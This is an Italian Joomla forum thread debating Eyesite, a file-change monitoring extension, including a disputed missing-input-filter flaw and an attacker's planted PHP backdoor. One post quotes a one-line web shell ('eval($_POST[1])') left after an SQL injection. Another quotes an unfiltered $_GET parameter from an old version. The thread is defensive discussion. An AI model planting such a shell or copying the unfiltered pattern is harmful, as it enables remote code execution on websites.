Joomla.it Forum

Forum traduzioni italiano => Le traduzioni e le informazioni della community => Articoli della community => : marine 12 Oct 2016, 16:29:03

: Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 12 Oct 2016, 16:29:03
Ciao a tutti,
ho scritto un nuovo articolo su Eyesite, un componente che monitora il nostro sito e ci avverte se c'è stata l'aggiunta, la rimozione o la modifica di un file nelle directory del nostro spazio web.
L'estensione Eyesite non aumenta il livello di sicurezza del nostro sito, ma nel caso che abbiamo subito un attacco il componente ci indica quali file sono stati aggiunti, cancellati o modificati nel nostro sito rendendoci molto più semplici le operazioni di ripristino.
Perchè il sistema funzioni dobbiamo installare ed abilitare Eyesite prima di subire l'attacco.

Link all'articolo:   http://www.joomla.it/e-ancora/articoli-community-3x/8473-attacchi-informatici-monitoriamo-il-nostro-sito-con-eyesite.html
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: MariaElenaBoschi 12 Oct 2016, 16:55:51
 il componente ci indica quali file sono stati aggiunti, cancellati o modificati nel nostro sito
--------------------------------------------------
e se la prima cosa che cancello o modifico è eyesite?
e se sfrutto una sqlinj e faccio un dump del db?
vale la pena di aggiungere codice per solo rfi?

sono solo riflessioni...
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: giusebos 12 Oct 2016, 17:15:36
ma magari ti "protegge" finchè non arriva uno con i controcogli**i
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 12 Oct 2016, 17:57:53
: MariaElenaBoschi  12 Oct 2016, 16:55:51
sono solo riflessioni...

E stringere le mani per fermare qualcosa che
e' dentro me ma nella mente tua non c'e'
Capire tu non puoi
tu chiamale se vuoi riflessioni
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: MariaElenaBoschi 12 Oct 2016, 19:13:33
..qualcosina, poco ne capisco o meglio ho fatto un po' di esperienza scrivendone qualcuna...

---------------------------------------
Eyesite scans your directory structures, storing the details of every file in a database table. The details stored include the file date/time, size, and md5 checksum of the file. Every time Eyesite re-scans the directory structure, it re-calculates the md5 checksum of each file, and compares it to the one stored in the database.
---------------------------------------
Se provi a vedere quante risorse succhia questa operazione già ti vengono i primi dubbi.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: Alex21 12 Oct 2016, 19:43:11
Una cosa come Eyesite mi sembra buona, specialmente se viene eseguito con cadenza periodica, diciamo una volta al giorno, magari di notte.
Non penso proprio che consumi più di tanto.

Lo dico perché dopo le ultime disavventure in materia adopero qualcosa di simile.
Se un sito viene hackerato è importante sapere subito quali file / tabelle sono stati alterati o sono nuovi, penso.
Con un sito joomla trovare gli elementi danneggiati non è per nulla facile senza un software di aiuto.


Ciao!
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: tomtomeight 12 Oct 2016, 20:04:09
Io ci andrei cauto, di certo può indurre un falso senso di sicurezza, non protegge nulla come giustamente specificato da marine, ma sentirsi sicuri per il fatto che tanto se mi attaccano sò cosa è stato toccato e quindi rimedio subito, non è scontato se l'hacker manomette pure il componente. Una falsa sicurezza produce più danni di non fare nulla. Non dico di non utilizzarlo ma non tralasciate le altre cose come backup e aggiornamenti.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 12 Oct 2016, 20:10:12
: MariaElenaBoschi  12 Oct 2016, 19:13:33
Se provi a vedere quante risorse succhia questa operazione già ti vengono i primi dubbi.

Che anno è che giorno è
questo è il tempo di vivere con te
le mie mani come vedi non tremano più
e ho nell'anima
in fondo all'anima cieli immensi
e immenso amore
e poi ancora ancora amore amor per te
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: MariaElenaBoschi 12 Oct 2016, 20:27:12
vabbè tu continui a fare lo spiritoso...si vede che ti viene meglio quello dell'informatica

io invece sto continuando a riflettere... ad esempio mi sto chiedendo se il file scanner.eyesite.php sia un file che resta sul sito...

se lo apro vedo nell'ordine:

- manca "l'antiapertura del file"....

- due righe sotto mi fa questa cosa
:
if (isset($_GET['entry']))
$entry = $_GET['entry'];ovvero tira dentro una var senza un minimo di controllo...

- e poco più sotto
:
logText(LOG_WITH_DATE,_text_('COM_EYESITE_SCANNER_ERROR_WRONG_ENTRY').' ('.$entry.')');
non ho tempo per provare ma mi è bastato il punto 1... poi tu ridi...
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 12 Oct 2016, 20:31:55
: MariaElenaBoschi  12 Oct 2016, 20:27:12
vabbè tu continui a fare lo spiritoso...si vede che ti viene meglio quello dell'informatica

non ho tempo per provare ma mi è bastato il punto 1... poi tu ridi...

Felicità.
Ti ho perso ieri ed oggi ti ritrovo già
Tristezza va
una canzone il tuo posto prenderà
Abbiam bevuto
e poi ballato
è mai possibile che ti abbia già scordato?
Eppure ieri morivo di dolore
ed oggi canta di nuovo il mio cuor
oggi canta di nuovo il mio cuor.
Felicità
Ti ho perso ieri ed oggi ti ritrovo già
Tristezza va
una canzone il tuo posto prenderà.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: adottauncane 12 Oct 2016, 22:19:27
@marine, scusa, senza polemica, sto seguendo il tread e non capisco perché invece di rispondere metti canzoni di Battisti...
Mi sembra che la ministra sollevi questioni interessanti...
E sarebbe interessante sapere che ne pensi tu, visto che hai scritto l'articolo e hai provato il plugin...
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 13 Oct 2016, 02:30:15
@adottauncane

ho provato il componente, ho fatto un test, come descritto nell'articolo, modificando, cancellando ed aggiungendo un file nella root e nelle sottocartelle ed il componente ha segnalato le modifiche.
Questo è quanto, non ho fatto altre prove né di dumb del database né di hackeraggio al componente stesso e nemmeno un sql injenction, ribadisco, ho fatto il test sopradescritto ed il componente ha funzionato, nulla di più e niente di meno.

@tutti i lettori di questa discussione

Nel mio articolo non dichiaro, e spero che nella lettura dell'articolo stesso questo concetto risulti molto chiaro, che il componente sia il Sacro Grall per la sicurezza del proprio sito, ho solo descritto un componente che mi era stato illustrato da un collega/amico di Joomla Veneto e che mi era sembrato interessante da provare e poi, visto il risultato positivo del test, da descrivere in un articolo in questo sito.
Nel frattempo che avevo in mente di scrivere questo articolo ho scoperto che la traduzione in italiano è stata fatta da altre due persone che conosco (anche loro soci di Joomla Veneto) e mi è sembrato carino menzionarli e ringraziarli pubblicamente per il loro contributo.
Questo è quanto.
Tutti gli articoli che ho scritto e scriverò su questo sito sono sostanzialmente elementari, illustrano componenti, pratiche o tool molto semplici, a volte banali.
Li scrivo per il piacere di condividere, di informare, di mettere a conoscenza gli utenti che esistono anche queste soluzioni; saranno poi gli utenti a decidere se utilizzare o meno le pratiche che descrivo, se ritenerle valide oppure no; non ho mai utilizzato un tono dove professo che la soluzione da me proposta sia la migliore o che seguendo le mie indicazioni si risolvano totalmente problemi quali la sicurezza o altro.

@MariaElenaBoschi

Ho risposto ai tuoi post citando i testi di Battisti (è un caso, non è nemmeno uno dei miei artisti preferiti, anzi) perchè nella mia non più breve vita posso, con orgoglio, dire di avere imparato una sola cosa importante: non esistono cose giuste o sbagliate, esiste il modo giusto o sbagliato di dirle.
Dalle risposte a questo post, ma anche da altri interventi in questo forum, io percepisco che tu fai la gara a chi ce l'ha più lungo (è una espressione popolare delle mie zone) e a me non interessa minimamente partecipare a queste gare, io so tranquillamente quanto ce l'ho lungo e non ho bisogno di gareggiare su questo.
Ribadisco che è la mia percezione, quindi è un problema mio, non ti chiedo di cambiare modo o tono di esprimerti, anzi, tu sentiti libero di comunicare come ritieni sia il modo migliore per te, come è giusto che sia.

@tutti i lettori di questa discussione

Scusate l'off topic ma visto che ho citatato 3 canzoni di Battisti che, come detto prima non è uno dei miei artitsti preferiti, colgo l'occasione per citare 3 artisti musicali che in realtà apprezzo molto e che se non li conoscete vi consiglio di darci un ascolto:


: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: simbus82 13 Oct 2016, 09:37:59
Interessante estensione, anche se si tratta di un "clone" di una delle funzioni (php scanner) che da sempre è dentro le Akeeba Admin Tools.
Grazie per il test, è un buon software da proporre a chi non ha le Admin Tools o non vuole installare il pacchetto Pro a pagamento.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 13 Oct 2016, 11:00:18
: simbus82  13 Oct 2016, 09:37:59
Grazie per il test

Grazie a te per il ringraziamento.
: Problemi per scaricarlo gratis...
: Carlotul 13 Oct 2016, 11:12:32
 :-\ ci sono problemi per scaricarlo ?
E' a pagamento ??
Sbaglio a fare clic su download ?
Grazie.
Carlo
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 13 Oct 2016, 11:26:32
: Carlotul  13 Oct 2016, 11:12:32
:-\ ci sono problemi per scaricarlo ?
E' a pagamento ??
Sbaglio a fare clic su download ?
Grazie.
Carlo

Ci sarà stato un qualche problema nel loro server, il componente è gratuito.
Se continui avere problemi nello scaricare il file fammelo sapere che te lo inoltro io.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: Carlotul 13 Oct 2016, 11:30:58
: marine  13 Oct 2016, 11:26:32
Ci sarà stato un qualche problema nel loro server, il componente è gratuito.
Se continui avere problemi nello scaricare il file fammelo sapere che te lo inoltro io.

Si infatti l'ho scaricato cliccando velocemente prima che si aprisse la popup ma il file è inutilizzabile e a 0 kb :(
Se puoi nandamelo, grazie
Carlo
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: adottauncane 13 Oct 2016, 11:31:40
: marine  13 Oct 2016, 02:30:15
@adottauncane

ho provato il componente, ho fatto un test, come descritto nell'articolo, modificando, cancellando ed aggiungendo un file nella root e nelle sottocartelle ed il componente ha segnalato le modifiche.
Questo è quanto, non ho fatto altre prove né di dumb del database né di hackeraggio al componente stesso e nemmeno un sql injenction, ribadisco, ho fatto il test sopradescritto ed il componente ha funzionato, nulla di più e niente di meno.


Va benissimo, è quello che si fa quando si scrive un articolo, e naturalmente ti ringrazio.
Solo resto con il dubbio (leggendo i post di MariaElenaBoschi io non ne capisco una cippa, tutto quello che faccio per la sicurezza è un backup e gli aggiornamenti) che magari il gioco non valga la candela...
È questo che mi interesserebbe capire.

Se qualcuno ha altre opinioni in merito...
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 13 Oct 2016, 11:37:05
: Carlotul  13 Oct 2016, 11:30:58
Se puoi nandamelo, grazie
Carlo

Scrivimi tramite messaggio privato il tuo indirizzo mail che te lo invio.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: jeckodevelopment 13 Oct 2016, 11:52:15
Dovremmo inserire in Joomla! qualcosa che blocchi le estensioni che non utilizzano la direttiva JEXEC come incipit dei file.
E' assurdo ancora che non si rispettino quelle poche regole di sicurezza che ci sono.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: adottauncane 13 Oct 2016, 12:00:13
E questo componente non le ha?
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: giusebos 13 Oct 2016, 12:05:40
Io attraverso questo componente sono riuscito a scovare 5 file modificati in un sito dove mi appariva della pubblicità, piccole stringhe inserite parte nei file core e parte in una estensione che elaboravano l'inserimento di questi banner ads non voluti.

Gli haker avevano fatto questo in un periodo dove c'era un susseguirsi di versioni buggate per un motivo o per un  altro, sia per il componente che per joomla, ma il bello è che l'attivazione della pubblicità c'è stata molto tempo dopo, confondendomi non poco in quanto tutto aggiornato.

Ci sono pro e contro, questo controllo dei file, md5 checksum, prende risorse, però ti aiuta moltissimo a capire se un file è modificato oppure.

Magari è da usare in ambito di ripristino...

Ma se pensate di controllare tutti gli overrade nella cartella HTML del template, nessun software potra farlo, li ognuno di noi a personalizzato a modo proprio i file, i vari sviluppatori di template anche.....

Però che un conto è verificare una ventina o anche il doppio di file contenuti dentro html, ed una cosa è verificare tutto il sito.

Aggiungo anche che adesso con la versione 3.6.2 possiamo sovrascrivere i file del core abbastanza agevolmente, eliminando qualsiasi dubbio di file core modificati, forse un sistema automatico di reinstallazione delle estensioni potrebbe farci raggiungere ad una sicurezza pari al 99,5% sull'integrità dei file?

: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: Alex21 13 Oct 2016, 12:31:23
: adottauncane  13 Oct 2016, 11:31:40
Va benissimo, è quello che si fa quando si scrive un articolo, e naturalmente ti ringrazio.
Solo resto con il dubbio (leggendo i post di MariaElenaBoschi io non ne capisco una cippa, tutto quello che faccio per la sicurezza è un backup e gli aggiornamenti) che magari il gioco non valga la candela...
È questo che mi interesserebbe capire.

Se qualcuno ha altre opinioni in merito...
Buongiorno Adottauncane, il mio è un ex trovatello che ormai ha già una certa età, poveretto.
Mi sembra logico che sia necessario fare dei backups periodici ma è anche importante eseguire regolarmente la scansione di tutti i file del sito, così da rendersi conto se ce ne sono di sospetti.
Ad esempio l'ultima anima pia - peraltro assolutamente nostrana a giudicare dal suo ip - è riuscita (con sql injection) ad inserire una cosa così:
/webconfig.txt.php   conteneva:
<?php eval($_POST[1]);?>

Il file alterato era nella radice, facile da trovare, ma poteva essere annidato chissà dove.
Non conosco lo specifico componente joomla ma dai risultati esegue un backup di tutto, con la differenza che invece di impacchettare i file dentro uno .zip si limita ad evidenziare la data di creazione o delle ultime modifiche.


Ciao!

: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: MariaElenaBoschi 13 Oct 2016, 13:16:36
: marine  13 Oct 2016, 02:30:15
Ho risposto ai tuoi post citando i testi di Battisti (è un caso, non è nemmeno uno dei miei artisti preferiti, anzi) perchè nella mia non più breve vita posso, con orgoglio, dire di avere imparato una sola cosa importante: non esistono cose giuste o sbagliate, esiste il modo giusto o sbagliato di dirle.

no no esistono le cose sbagliate, un'estensione per la sicurezza che introduce vulnerabilità non è un astrazione è una cosa sbagliata che tu promuovi

: marine  13 Oct 2016, 02:30:15
Dalle risposte a questo post, ma anche da altri interventi in questo forum, io percepisco che tu fai la gara a chi ce l'ha più lungo

e l'ho vinta ;)
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 13 Oct 2016, 13:30:17
: MariaElenaBoschi  13 Oct 2016, 13:16:36
e l'ho vinta ;)

Ben per te
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: Pietro Tedde 13 Oct 2016, 15:09:38
A me questo sembra un ottimo mezzo, l'unico problema che ho riscontrato è una sorta di incompatibilità tra questo e akeeba.
Infatti, ogni volta che tento di creare un backup, si interrompe al 73% su alcuni siti, su altri mi da un errore a completamento dello stesso.. Utile, ma non posso usarlo ovunque.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: jeckodevelopment 13 Oct 2016, 18:50:32
e il Ministro ti ha anche detto perché si blocca...
ad ogni modo, sconsiglio caldamente di installare un'estensione come questa che introduce una vulnerabilità (il mancato filtro).

Meglio AdminTools.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: giusebos 13 Oct 2016, 18:56:59
ma con admintools come si fa, gli detti un occhiata ma non ci capii niente.
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: MariaElenaBoschi 13 Oct 2016, 20:18:38
: jeckodevelopment  13 Oct 2016, 18:50:32
e il Ministro ti ha anche detto perché si blocca...
ad ogni modo, sconsiglio caldamente di installare un'estensione come questa che introduce una vulnerabilità (il mancato filtro).

Meglio AdminTools.

il problema delle risorse consumate esiste perchè l'ho provato. Avevo trovato anche che un parziale rimedio era usare le classi di php tipo DIRECTORY_ITERATOR.

Quella della vulnerabilità io non lo so, ho chiesto di verificare se esisteva quel file e se era scritto così. Se sì allora è una vulnerabilità se no allora può darsi abbia io in mano un file di una versione vecchia... cioè non è che mi sono sbattuto più di tanto ;)
: Re:Attacchi informatici, monitoriamo il nostro sito con Eyesite
: marine 14 Oct 2016, 11:45:41
: MariaElenaBoschi  13 Oct 2016, 13:16:36
un'estensione per la sicurezza che introduce vulnerabilità non è un astrazione è una cosa

: MariaElenaBoschi  13 Oct 2016, 20:18:38
Quella della vulnerabilità io non lo so, ho chiesto di verificare se esisteva quel file e se era scritto così. Se sì allora è una vulnerabilità se no allora può darsi abbia io in mano un file di una versione vecchia... cioè non è che mi sono sbattuto più di tanto ;)

@ElenaMariaBoschi

Cioè, fammi capire, hai screditato il lavoro di una persona (lo sviluppatore dell'estensione), affermando pubblicamente che il componente introduce una vulnerabilità e poi retifichi con "cioè non è che mi sono sbattuto più di tanto (faccetta che ammicca)".

@tutti
Lo sviluppatore, contattato via mail, conferma che il codice che ElenaMariaBoschi ha postato è di una vecchia versione e che la versione attuale non ha nessuna falla di sicurezza al momento conosciuta.

@ElenaMariaBoschi

: MariaElenaBoschi  13 Oct 2016, 13:16:36
e l'ho vinta ;)

Si, hai vinto.